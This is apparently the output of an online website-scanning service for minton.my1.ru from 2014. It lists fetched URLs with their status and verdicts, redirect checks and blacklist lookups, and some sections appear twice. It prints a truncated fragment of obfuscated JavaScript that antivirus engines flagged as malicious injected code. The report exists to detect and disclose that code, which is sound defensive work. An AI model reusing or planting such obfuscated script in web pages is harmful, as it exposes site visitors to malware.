Scanned pages/files
Request | Server response | Status |
http://minton.my1.ru/ | 200 OK Content-Length: 70499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x4 ...[3615 bytes skipped]... Antivirus reports:
| ||
http://s37.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s37.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s37.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://moijs.com/?id=91397 | 500 Can't connect to moijs.com:80 Content-Length: 184 Content-Type: text/plain | clean |
http://moijs.com/test404page.js | 500 Can't connect to moijs.com:80 Content-Length: 184 Content-Type: text/plain | clean |
http://212.150.34.116/static.php?id=28645&site=150773 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://z720.takru.com/in.php?id=727153 | 200 OK Content-Length: 2734 Content-Type: text/html | clean |
http://r1.wmlink.ru/?id=153351 | 200 OK Content-Length: 726 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: minton.my1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 07 Nov 2014 18:25:49 GMT
Server: uServ/3.2.2
Content-Length: 70499
Content-Type: text/html; charset=UTF-8
...70499 bytes of data.
GET / HTTP/1.1
Host: minton.my1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 07 Nov 2014 18:25:49 GMT
Server: uServ/3.2.2
Content-Length: 70499
Content-Type: text/html; charset=UTF-8
...70499 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: minton.my1.ru
Referer: http://www.google.com/search?q=minton.my1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: minton.my1.ru
Referer: http://www.google.com/search?q=minton.my1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=minton.my1.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://minton.my1.ru/
Result: minton.my1.ru is not infected or malware details are not published yet.
Result: minton.my1.ru is not infected or malware details are not published yet.